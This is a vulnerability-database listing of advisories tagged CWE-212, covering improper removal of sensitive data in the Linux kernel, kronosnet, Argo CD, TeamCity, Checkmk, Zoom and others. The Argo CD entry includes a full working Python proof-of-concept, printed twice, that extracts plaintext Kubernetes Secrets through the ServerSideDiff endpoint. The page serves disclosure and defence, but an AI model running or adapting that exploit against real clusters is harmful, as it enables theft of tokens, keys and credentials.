CWE-212
AllowedImproper Removal of Sensitive Information Before Storage or Transfer
Abstraction: Base · Status: Incomplete
The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.
184 vulnerabilities reference this CWE, most recent first.
GHSA-3HPJ-266F-M43F
Vulnerability from github – Published: 2023-03-28 00:34 – Updated: 2023-04-03 18:32A flaw that boot CPU could be vulnerable for the speculative execution behavior kind of attacks in the Linux kernel X86 CPU Power management options functionality was found in the way user resuming CPU from suspend-to-RAM. A local user could use this flaw to potentially get unauthorized access to some memory of the CPU similar to the speculative execution behavior kind of attacks.
{
"affected": [],
"aliases": [
"CVE-2023-1637"
],
"database_specific": {
"cwe_ids": [
"CWE-212",
"CWE-226"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-27T22:15:00Z",
"severity": "MODERATE"
},
"details": "A flaw that boot CPU could be vulnerable for the speculative execution behavior kind of attacks in the Linux kernel X86 CPU Power management options functionality was found in the way user resuming CPU from suspend-to-RAM. A local user could use this flaw to potentially get unauthorized access to some memory of the CPU similar to the speculative execution behavior kind of attacks.",
"id": "GHSA-3hpj-266f-m43f",
"modified": "2023-04-03T18:32:05Z",
"published": "2023-03-28T00:34:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1637"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e2a1256b17b16f9b9adf1b6fea56819e7b68e463"
},
{
"type": "WEB",
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27398"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3P9P-8J59-V9H3
Vulnerability from github – Published: 2026-07-21 06:31 – Updated: 2026-07-21 06:31A vulnerability was found in kronosnet's (version <=1.34) cryptographic configuration management. The framework does not correctly zero-out or wipe sensitive memory segments after executing changes to its cryptographic configuration. This omission leaves raw encryption keys resident in memory after the associated structures are freed. A local attacker capable of leveraging memory disclosure techniques could exploit this flaw to retrieve the active encryption key, allowing them to decrypt cluster network communications or inject malicious packets to cause severe high-availability cluster instability.
{
"affected": [],
"aliases": [
"CVE-2026-15811"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-21T06:16:28Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in kronosnet\u0027s (version \u003c=1.34) cryptographic configuration management. The framework does not correctly zero-out or wipe sensitive memory segments after executing changes to its cryptographic configuration. This omission leaves raw encryption keys resident in memory after the associated structures are freed. A local attacker capable of leveraging memory disclosure techniques could exploit this flaw to retrieve the active encryption key, allowing them to decrypt cluster network communications or inject malicious packets to cause severe high-availability cluster instability.",
"id": "GHSA-3p9p-8j59-v9h3",
"modified": "2026-07-21T06:31:18Z",
"published": "2026-07-21T06:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15811"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-15811"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500849"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-3V3M-WC6V-X4X3
Vulnerability from github – Published: 2026-05-07 01:56 – Updated: 2026-05-11 13:30Summary
There is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism.
Details
Argo CD masks Secret data in every endpoint that returns Kubernetes resource state except one. All the other endpoints such as GetManifests, GetManifestsWithFiles, GetResource and PatchResource utilize hideSecretData() to mask the returned secret value. The vulnerable function ServerSideDiff gRPC/REST endpoint (/application.ApplicationService/ServerSideDiff) constructs its response with raw, unmasked PredictedLive and NormalizedLive states:
// server/application/application.go:3051-3062
responseDiffs = append(responseDiffs, &v1alpha1.ResourceDiff{
TargetState: string(diffRes.PredictedLive),
LiveState: string(diffRes.NormalizedLive),
})
A user only requires RBAC to call this ServerSideDiff function. Every authenticated Argo CD user has get access via the default role:catch-all policy. However, Argo CD has a defense layer called removeWebhookMutation() that normally strips non-Argo CD-managed fields from the Server Side Apply (SSA) dry-run response and merges them with the client-provided (masked) live state. This prevents real Secret values from leaking through the diff. However, this defense is entirely skipped when the Application has the annotation argocd.argoproj.io/compare-options: IncludeMutationWebhook=true. When IncludeMutationWebhook=true is set, ignoreMutationWebhook becomes false, and the defense is skipped entirely:
if o.ignoreMutationWebhook {
predictedLive, err = removeWebhookMutation(predictedLive, live, o.gvkParser, o.manager)
}
The raw Kubernetes SSA dry-run response which contains real Secret values read from etcd is then flown directly into the API response with no masking.
When ServerSideDiff is called, the handler invokes K8sServerSideDryRunner.Run(), which performs the equivalent of:
kubectl apply --server-side --dry-run=server --field-manager=argocd-controller
For extraction to succeed, the Secret's data fields must be owned by at least one non-Argo CD SSA field manager. When argocd-controller is the sole field manager for data, the SSA dry-run garbage-collects those fields (since the target manifest omits them). When a second manager exists (e.g., kube-controller-manager), that manager retains ownership and the real values survive in the response.
PoC
#!/usr/bin/env python3
"""
Argo CD ServerSideDiff Secret Extraction PoC
Usage:
python3 poc.py <host> <token> <app> <project>
Example:
python3 poc.py argocd.int.<customer>.com eyJhbG... my-app my-project
"""
import base64
import http.client
import json
import ssl
import struct
import sys
import urllib.parse
from collections import defaultdict
def encode_varint(v):
out = []
while v > 0x7f:
out.append((v & 0x7f) | 0x80)
v >>= 7
out.append(v & 0x7f)
return bytes(out)
def encode_str(field, val):
tag = (field << 3) | 2
raw = val.encode()
return encode_varint(tag) + encode_varint(len(raw)) + raw
def encode_bytes(field, val):
tag = (field << 3) | 2
return encode_varint(tag) + encode_varint(len(val)) + val
def encode_bool(field, val):
tag = (field << 3) | 0
return encode_varint(tag) + encode_varint(1 if val else 0)
def decode_varint(data, pos):
val, shift = 0, 0
while pos < len(data):
b = data[pos]; pos += 1
val |= (b & 0x7f) << shift; shift += 7
if not (b & 0x80):
break
return val, pos
def decode_fields(data):
fields = defaultdict(list)
pos = 0
while pos < len(data):
tag, pos = decode_varint(data, pos)
wtype = tag & 0x07
if wtype == 0:
val, pos = decode_varint(data, pos)
fields[tag >> 3].append(val)
elif wtype == 2:
length, pos = decode_varint(data, pos)
fields[tag >> 3].append(data[pos:pos + length])
pos += length
elif wtype == 5:
fields[tag >> 3].append(data[pos:pos + 4]); pos += 4
elif wtype == 1:
fields[tag >> 3].append(data[pos:pos + 8]); pos += 8
else:
break
return dict(fields)
# -- grpc-web framing --
def grpc_frame(payload):
return b"\x00" + struct.pack(">I", len(payload)) + payload
def decode_grpc_frames(data):
frames, pos = [], 0
while pos + 5 <= len(data):
flag = data[pos]
length = struct.unpack(">I", data[pos+1:pos+5])[0]
pos += 5
frames.append((flag, data[pos:pos+length]))
pos += length
return frames
# -- http helpers --
def make_conn(host):
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)
def rest_get(conn, path, token):
conn.request("GET", path, headers={
"Authorization": "Bearer " + token,
"Accept": "application/json",
})
resp = conn.getresponse()
body = resp.read()
if resp.status != 200:
return None, "HTTP %d" % resp.status
return json.loads(body), None
def grpc_post(conn, token, payload):
conn.request("POST", "/application.ApplicationService/ServerSideDiff",
body=grpc_frame(payload), headers={
"Content-Type": "application/grpc-web+proto",
"Accept": "application/grpc-web+proto",
"X-Grpc-Web": "1",
"Authorization": "Bearer " + token,
})
resp = conn.getresponse()
raw = resp.read()
if resp.status != 200:
return None, "HTTP %d" % resp.status
frames = decode_grpc_frames(raw)
for flag, fdata in frames:
if flag == 0:
return fdata, None
return None, "no data frame in response"
# -- main --
def main():
if len(sys.argv) != 5:
print("Usage: python3 poc.py <host> <token> <app> <project>")
sys.exit(1)
host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
conn = make_conn(host)
# step 1: list managed resources for the app, find secrets
print("[*] Fetching managed resources for %s/%s ..." % (project, app_name))
data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token)
if err:
print("[-] Failed: %s" % err); sys.exit(1)
secrets = []
for r in data.get("items", []):
if r.get("kind") != "Secret":
continue
name = r.get("name", "")
ns = r.get("namespace", "")
live = r.get("liveState", "")
stype = "Opaque"
if live and live != "null":
try:
stype = json.loads(live).get("type", "Opaque")
except Exception:
pass
secrets.append((name, ns, stype, live))
if not secrets:
print("[-] No secrets found in managed resources"); sys.exit(0)
print("[+] Found %d secrets" % len(secrets))
# step 2: call ServerSideDiff for each secret
total_extracted = 0
for sname, sns, stype, live_json in secrets:
# build minimal target manifest (no data field)
target = {"apiVersion": "v1", "kind": "Secret",
"metadata": {"name": sname, "namespace": sns},
"type": stype}
# copy required annotations from live state for SA tokens
if live_json and live_json != "null":
try:
live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {})
k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")}
if k8s_annots:
target["metadata"]["annotations"] = k8s_annots
except Exception:
pass
# for TLS secrets, include required placeholder keys
if stype == "kubernetes.io/tls":
target["data"] = {
"tls.crt": base64.b64encode(b"PLACEHOLDER").decode(),
"tls.key": base64.b64encode(b"PLACEHOLDER").decode(),
}
elif stype == "kubernetes.io/dockerconfigjson":
target["data"] = {".dockerconfigjson": base64.b64encode(b'{"auths":{}}').decode()}
# encode the grpc request
lr = b""
lr += encode_str(2, "Secret") # kind
lr += encode_str(3, sns) # namespace
lr += encode_str(4, sname) # name
if live_json:
lr += encode_str(6, live_json) # liveState
lr += encode_bool(12, True) # modified
query = encode_str(1, app_name)
query += encode_str(3, project)
query += encode_bytes(4, lr)
query += encode_str(5, json.dumps(target))
# reconnect for each call (simple, no pool needed for poc)
try:
conn = make_conn(host)
resp_data, err = grpc_post(conn, token, query)
except Exception as e:
print(" [!] %s/%s: %s" % (sns, sname, e))
continue
if err:
print(" [!] %s/%s: %s" % (sns, sname, err))
continue
# parse response
resp_fields = decode_fields(resp_data)
for item_bytes in resp_fields.get(1, []):
if not isinstance(item_bytes, bytes):
continue
ifields = decode_fields(item_bytes)
# field 5 = targetState (predictedLive — has real values from etcd)
for raw in ifields.get(5, []):
if not isinstance(raw, bytes):
continue
try:
obj = json.loads(raw)
except Exception:
continue
if obj.get("kind") != "Secret":
continue
secret_data = obj.get("data", {})
if not secret_data:
continue
# check for real (non-masked) values
real_keys = {}
for k, v in secret_data.items():
if not v:
continue
if all(c == "+" for c in v):
continue # masked by argocd
try:
decoded = base64.b64decode(v)
text = decoded.decode("utf-8", errors="replace")
except Exception:
continue
if all(c == "+" for c in text) and text:
continue # masked (base64 of +++...)
real_keys[k] = text
if real_keys:
total_extracted += 1
print("\n [***] %s/%s (%s)" % (sns, sname, stype))
print(" %d/%d keys extracted:" % (len(real_keys), len(secret_data)))
for k in sorted(real_keys):
v = real_keys[k].replace("\n", "\\n")
if len(v) > 120:
v = v[:120] + "..."
print(" %s: %s" % (k, v))
print("\n[*] Done. %d secrets with real values extracted." % total_extracted)
if __name__ == "__main__":
main()
Impact
Any user with Argo CD application get permissions can extract real Kubernetes Secret values including service account tokens, TLS certificates, database credentials, and API keys. On Applications where IncludeMutationWebhook=true is already set, exploitation requires only read-only Argo CD access.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0"
},
{
"fixed": "3.2.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42880"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-212"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T01:56:53Z",
"nvd_published_at": "2026-05-07T23:16:32Z",
"severity": "CRITICAL"
},
"details": "### Summary\nThere is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism.\n\n### Details\nArgo CD masks Secret data in every endpoint that returns Kubernetes resource state except one. All the other endpoints such as GetManifests, GetManifestsWithFiles, GetResource and PatchResource utilize hideSecretData() to mask the returned secret value. The vulnerable function ServerSideDiff gRPC/REST endpoint (/application.ApplicationService/ServerSideDiff) constructs its response with raw, unmasked PredictedLive and NormalizedLive states:\n\n```\n// server/application/application.go:3051-3062\nresponseDiffs = append(responseDiffs, \u0026v1alpha1.ResourceDiff{\n TargetState: string(diffRes.PredictedLive),\n LiveState: string(diffRes.NormalizedLive),\n})\n```\n\nA user only requires RBAC to call this ServerSideDiff function. Every authenticated Argo CD user has get access via the default role:catch-all policy. However, Argo CD has a defense layer called removeWebhookMutation() that normally strips non-Argo CD-managed fields from the Server Side Apply (SSA) dry-run response and merges them with the client-provided (masked) live state. This prevents real Secret values from leaking through the diff. However, this defense is entirely skipped when the Application has the annotation argocd.argoproj.io/compare-options: IncludeMutationWebhook=true.\nWhen IncludeMutationWebhook=true is set, ignoreMutationWebhook becomes false, and the defense is skipped entirely:\n\n```\nif o.ignoreMutationWebhook {\n predictedLive, err = removeWebhookMutation(predictedLive, live, o.gvkParser, o.manager)\n}\n```\n\nThe raw Kubernetes SSA dry-run response which contains real Secret values read from etcd is then flown directly into the API response with no masking.\n\nWhen ServerSideDiff is called, the handler invokes K8sServerSideDryRunner.Run(), which performs the equivalent of:\n\n`kubectl apply --server-side --dry-run=server --field-manager=argocd-controller\n`\nFor extraction to succeed, the Secret\u0027s data fields must be owned by at least one non-Argo CD SSA field manager. When argocd-controller is the sole field manager for data, the SSA dry-run garbage-collects those fields (since the target manifest omits them). When a second manager exists (e.g., kube-controller-manager), that manager retains ownership and the real values survive in the response.\n\n### PoC\n```\n#!/usr/bin/env python3\n\"\"\"\nArgo CD ServerSideDiff Secret Extraction PoC\n\nUsage:\n python3 poc.py \u003chost\u003e \u003ctoken\u003e \u003capp\u003e \u003cproject\u003e\n\nExample:\n python3 poc.py argocd.int.\u003ccustomer\u003e.com eyJhbG... my-app my-project\n\"\"\"\n\nimport base64\nimport http.client\nimport json\nimport ssl\nimport struct\nimport sys\nimport urllib.parse\nfrom collections import defaultdict\n\ndef encode_varint(v):\n out = []\n while v \u003e 0x7f:\n out.append((v \u0026 0x7f) | 0x80)\n v \u003e\u003e= 7\n out.append(v \u0026 0x7f)\n return bytes(out)\n\ndef encode_str(field, val):\n tag = (field \u003c\u003c 3) | 2\n raw = val.encode()\n return encode_varint(tag) + encode_varint(len(raw)) + raw\n\ndef encode_bytes(field, val):\n tag = (field \u003c\u003c 3) | 2\n return encode_varint(tag) + encode_varint(len(val)) + val\n\ndef encode_bool(field, val):\n tag = (field \u003c\u003c 3) | 0\n return encode_varint(tag) + encode_varint(1 if val else 0)\n\ndef decode_varint(data, pos):\n val, shift = 0, 0\n while pos \u003c len(data):\n b = data[pos]; pos += 1\n val |= (b \u0026 0x7f) \u003c\u003c shift; shift += 7\n if not (b \u0026 0x80):\n break\n return val, pos\n\ndef decode_fields(data):\n fields = defaultdict(list)\n pos = 0\n while pos \u003c len(data):\n tag, pos = decode_varint(data, pos)\n wtype = tag \u0026 0x07\n if wtype == 0:\n val, pos = decode_varint(data, pos)\n fields[tag \u003e\u003e 3].append(val)\n elif wtype == 2:\n length, pos = decode_varint(data, pos)\n fields[tag \u003e\u003e 3].append(data[pos:pos + length])\n pos += length\n elif wtype == 5:\n fields[tag \u003e\u003e 3].append(data[pos:pos + 4]); pos += 4\n elif wtype == 1:\n fields[tag \u003e\u003e 3].append(data[pos:pos + 8]); pos += 8\n else:\n break\n return dict(fields)\n\n\n# -- grpc-web framing --\n\ndef grpc_frame(payload):\n return b\"\\x00\" + struct.pack(\"\u003eI\", len(payload)) + payload\n\ndef decode_grpc_frames(data):\n frames, pos = [], 0\n while pos + 5 \u003c= len(data):\n flag = data[pos]\n length = struct.unpack(\"\u003eI\", data[pos+1:pos+5])[0]\n pos += 5\n frames.append((flag, data[pos:pos+length]))\n pos += length\n return frames\n\n\n# -- http helpers --\n\ndef make_conn(host):\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)\n\ndef rest_get(conn, path, token):\n conn.request(\"GET\", path, headers={\n \"Authorization\": \"Bearer \" + token,\n \"Accept\": \"application/json\",\n })\n resp = conn.getresponse()\n body = resp.read()\n if resp.status != 200:\n return None, \"HTTP %d\" % resp.status\n return json.loads(body), None\n\ndef grpc_post(conn, token, payload):\n conn.request(\"POST\", \"/application.ApplicationService/ServerSideDiff\",\n body=grpc_frame(payload), headers={\n \"Content-Type\": \"application/grpc-web+proto\",\n \"Accept\": \"application/grpc-web+proto\",\n \"X-Grpc-Web\": \"1\",\n \"Authorization\": \"Bearer \" + token,\n })\n resp = conn.getresponse()\n raw = resp.read()\n if resp.status != 200:\n return None, \"HTTP %d\" % resp.status\n frames = decode_grpc_frames(raw)\n for flag, fdata in frames:\n if flag == 0:\n return fdata, None\n return None, \"no data frame in response\"\n\n\n# -- main --\n\ndef main():\n if len(sys.argv) != 5:\n print(\"Usage: python3 poc.py \u003chost\u003e \u003ctoken\u003e \u003capp\u003e \u003cproject\u003e\")\n sys.exit(1)\n\n host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]\n conn = make_conn(host)\n\n # step 1: list managed resources for the app, find secrets\n print(\"[*] Fetching managed resources for %s/%s ...\" % (project, app_name))\n data, err = rest_get(conn, \"/api/v1/applications/%s/managed-resources\" % urllib.parse.quote(app_name), token)\n if err:\n print(\"[-] Failed: %s\" % err); sys.exit(1)\n\n secrets = []\n for r in data.get(\"items\", []):\n if r.get(\"kind\") != \"Secret\":\n continue\n name = r.get(\"name\", \"\")\n ns = r.get(\"namespace\", \"\")\n live = r.get(\"liveState\", \"\")\n stype = \"Opaque\"\n if live and live != \"null\":\n try:\n stype = json.loads(live).get(\"type\", \"Opaque\")\n except Exception:\n pass\n secrets.append((name, ns, stype, live))\n\n if not secrets:\n print(\"[-] No secrets found in managed resources\"); sys.exit(0)\n print(\"[+] Found %d secrets\" % len(secrets))\n\n # step 2: call ServerSideDiff for each secret\n total_extracted = 0\n for sname, sns, stype, live_json in secrets:\n # build minimal target manifest (no data field)\n target = {\"apiVersion\": \"v1\", \"kind\": \"Secret\",\n \"metadata\": {\"name\": sname, \"namespace\": sns},\n \"type\": stype}\n\n # copy required annotations from live state for SA tokens\n if live_json and live_json != \"null\":\n try:\n live_annots = json.loads(live_json).get(\"metadata\", {}).get(\"annotations\", {})\n k8s_annots = {k: v for k, v in live_annots.items() if k.startswith(\"kubernetes.io/\")}\n if k8s_annots:\n target[\"metadata\"][\"annotations\"] = k8s_annots\n except Exception:\n pass\n\n # for TLS secrets, include required placeholder keys\n if stype == \"kubernetes.io/tls\":\n target[\"data\"] = {\n \"tls.crt\": base64.b64encode(b\"PLACEHOLDER\").decode(),\n \"tls.key\": base64.b64encode(b\"PLACEHOLDER\").decode(),\n }\n elif stype == \"kubernetes.io/dockerconfigjson\":\n target[\"data\"] = {\".dockerconfigjson\": base64.b64encode(b\u0027{\"auths\":{}}\u0027).decode()}\n\n # encode the grpc request\n lr = b\"\"\n lr += encode_str(2, \"Secret\") # kind\n lr += encode_str(3, sns) # namespace\n lr += encode_str(4, sname) # name\n if live_json:\n lr += encode_str(6, live_json) # liveState\n lr += encode_bool(12, True) # modified\n\n query = encode_str(1, app_name)\n query += encode_str(3, project)\n query += encode_bytes(4, lr)\n query += encode_str(5, json.dumps(target))\n\n # reconnect for each call (simple, no pool needed for poc)\n try:\n conn = make_conn(host)\n resp_data, err = grpc_post(conn, token, query)\n except Exception as e:\n print(\" [!] %s/%s: %s\" % (sns, sname, e))\n continue\n if err:\n print(\" [!] %s/%s: %s\" % (sns, sname, err))\n continue\n\n # parse response\n resp_fields = decode_fields(resp_data)\n for item_bytes in resp_fields.get(1, []):\n if not isinstance(item_bytes, bytes):\n continue\n ifields = decode_fields(item_bytes)\n\n # field 5 = targetState (predictedLive \u2014 has real values from etcd)\n for raw in ifields.get(5, []):\n if not isinstance(raw, bytes):\n continue\n try:\n obj = json.loads(raw)\n except Exception:\n continue\n if obj.get(\"kind\") != \"Secret\":\n continue\n secret_data = obj.get(\"data\", {})\n if not secret_data:\n continue\n\n # check for real (non-masked) values\n real_keys = {}\n for k, v in secret_data.items():\n if not v:\n continue\n if all(c == \"+\" for c in v):\n continue # masked by argocd\n try:\n decoded = base64.b64decode(v)\n text = decoded.decode(\"utf-8\", errors=\"replace\")\n except Exception:\n continue\n if all(c == \"+\" for c in text) and text:\n continue # masked (base64 of +++...)\n real_keys[k] = text\n\n if real_keys:\n total_extracted += 1\n print(\"\\n [***] %s/%s (%s)\" % (sns, sname, stype))\n print(\" %d/%d keys extracted:\" % (len(real_keys), len(secret_data)))\n for k in sorted(real_keys):\n v = real_keys[k].replace(\"\\n\", \"\\\\n\")\n if len(v) \u003e 120:\n v = v[:120] + \"...\"\n print(\" %s: %s\" % (k, v))\n\n print(\"\\n[*] Done. %d secrets with real values extracted.\" % total_extracted)\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Impact\nAny user with Argo CD application get permissions can extract real Kubernetes Secret values including service account tokens, TLS certificates, database credentials, and API keys. On Applications where IncludeMutationWebhook=true is already set, exploitation requires only read-only Argo CD access.",
"id": "GHSA-3v3m-wc6v-x4x3",
"modified": "2026-05-11T13:30:01Z",
"published": "2026-05-07T01:56:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42880"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction"
}
GHSA-445Q-7482-76FP
Vulnerability from github – Published: 2024-12-20 15:30 – Updated: 2024-12-20 15:30In JetBrains TeamCity before 2024.12 backup file exposed user credentials and session cookies
{
"affected": [],
"aliases": [
"CVE-2024-56353"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-20T15:15:09Z",
"severity": "MODERATE"
},
"details": "In JetBrains TeamCity before 2024.12 backup file exposed user credentials and session cookies",
"id": "GHSA-445q-7482-76fp",
"modified": "2024-12-20T15:30:48Z",
"published": "2024-12-20T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56353"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-46JM-3G2R-J53X
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32folly::secureRandom will re-use a buffer between parent and child processes when fork() is called. That will result in multiple forked children producing repeat (or similar) results. This affects HHVM 3.26 prior to 3.26.3 and the folly library between v2017.12.11.00 and v2018.08.09.00.
{
"affected": [],
"aliases": [
"CVE-2018-6337"
],
"database_specific": {
"cwe_ids": [
"CWE-119",
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-31T22:29:00Z",
"severity": "HIGH"
},
"details": "folly::secureRandom will re-use a buffer between parent and child processes when fork() is called. That will result in multiple forked children producing repeat (or similar) results. This affects HHVM 3.26 prior to 3.26.3 and the folly library between v2017.12.11.00 and v2018.08.09.00.",
"id": "GHSA-46jm-3g2r-j53x",
"modified": "2022-05-13T01:32:03Z",
"published": "2022-05-13T01:32:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6337"
},
{
"type": "WEB",
"url": "https://github.com/facebook/folly/commit/8e927ee48b114c8a2f90d0cbd5ac753795a6761f"
},
{
"type": "WEB",
"url": "https://github.com/facebook/hhvm/commit/e2d10a1e32d01f71aaadd81169bcb9ae86c5d6b8"
},
{
"type": "WEB",
"url": "https://hhvm.com/blog/2018/05/24/hhvm-3.26.3.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5393-2V6G-PGWC
Vulnerability from github – Published: 2025-12-18 15:30 – Updated: 2025-12-23 18:30SSH private keys of the "Remote alert handlers (Linux)" rule were exposed in the rule page's HTML source in Checkmk <= 2.4.0p18 and all versions of Checkmk 2.3.0. This potentially allowed unauthorized triggering of predefined alert handlers on hosts where the handler was deployed.
{
"affected": [],
"aliases": [
"CVE-2025-65000"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-18T14:15:59Z",
"severity": "LOW"
},
"details": "SSH private keys of the \"Remote alert handlers (Linux)\" rule were exposed in the rule page\u0027s HTML source in Checkmk \u003c= 2.4.0p18 and all versions of Checkmk 2.3.0. This potentially allowed unauthorized triggering of predefined alert handlers on hosts where the handler was deployed.",
"id": "GHSA-5393-2v6g-pgwc",
"modified": "2025-12-23T18:30:24Z",
"published": "2025-12-18T15:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65000"
},
{
"type": "WEB",
"url": "https://checkmk.com/werk/19030"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-578W-C3RG-XX4Q
Vulnerability from github – Published: 2022-05-01 01:48 – Updated: 2024-02-15 21:31A design flaw in image processing software that modifies JPEG images might not modify the original EXIF thumbnail, which could lead to an information leak of potentially sensitive visual information that had been removed from the main JPEG image.
{
"affected": [],
"aliases": [
"CVE-2005-0406"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2005-02-14T05:00:00Z",
"severity": "LOW"
},
"details": "A design flaw in image processing software that modifies JPEG images might not modify the original EXIF thumbnail, which could lead to an information leak of potentially sensitive visual information that had been removed from the main JPEG image.",
"id": "GHSA-578w-c3rg-xx4q",
"modified": "2024-02-15T21:31:23Z",
"published": "2022-05-01T01:48:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2005-0406"
},
{
"type": "WEB",
"url": "http://seclists.org/lists/fulldisclosure/2005/Feb/0343.html"
},
{
"type": "WEB",
"url": "http://www.redteam-pentesting.de/advisories/rt-sa-2005-008.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5F88-RR7V-C4QV
Vulnerability from github – Published: 2025-11-13 15:30 – Updated: 2025-11-13 15:30Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access.
{
"affected": [],
"aliases": [
"CVE-2025-62483"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-13T15:15:51Z",
"severity": "MODERATE"
},
"details": "Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access.",
"id": "GHSA-5f88-rr7v-c4qv",
"modified": "2025-11-13T15:30:31Z",
"published": "2025-11-13T15:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62483"
},
{
"type": "WEB",
"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25047"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-5M8F-V3GW-H94W
Vulnerability from github – Published: 2022-02-16 00:01 – Updated: 2023-10-27 16:52Jenkins Support Core Plugin 2.79 and earlier does not redact some sensitive information in the support bundle. Support Core Plugin 2.79.1 adds a list of keywords whose associated values are redacted.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
